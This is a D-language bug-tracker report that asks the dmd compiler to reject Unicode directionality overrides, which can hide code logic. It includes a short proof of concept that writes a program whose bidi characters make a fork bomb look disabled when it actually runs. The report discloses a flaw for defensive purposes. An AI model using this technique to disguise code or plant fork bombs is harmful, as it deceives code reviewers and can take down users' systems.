[Issue 22495] New: SECURITY: unicode directionality overrides should be rejected
d-bugmail at puremagic.com
d-bugmail at puremagic.com
Mon Nov 8 21:12:02 UTC 2021
https://issues.dlang.org/show_bug.cgi?id=22495
Issue ID: 22495
Summary: SECURITY: unicode directionality overrides should be
rejected
Product: D
Version: D2
Hardware: All
OS: All
Status: NEW
Severity: blocker
Priority: P1
Component: dmd
Assignee: nobody at puremagic.com
Reporter: Ajieskola at gmail.com
Read:
https://www.schneier.com/blog/archives/2021/11/hiding-vulnerabilities-in-source-code.html
Demonstration (for Unix systems) that the vulnerability affects the D
compilers:
------------------
import std;
auto exploit =
"import core.sys.posix.unistd;
enum mode = \"safe\";
@safe void main(){
if (mode != \"safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066\")
while(fork()){};
}";
@safe void main()
{ File("payload.d", "w").writeln(exploit);
}
------------------
When run, this file generates a program that looks like
----------
import core.sys.posix.unistd;
enum mode = "safe";
@safe void main(){
if (mode != "safe") // Check if safe ( disabled )
while(fork()){};
}
----------
But compiles like
----------
import core.sys.posix.unistd;
enum mode = "safe";
@safe void main(){
if (mode != "safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066")
while(fork()){};
}
----------
--
More information about the Digitalmars-d-bugs
mailing list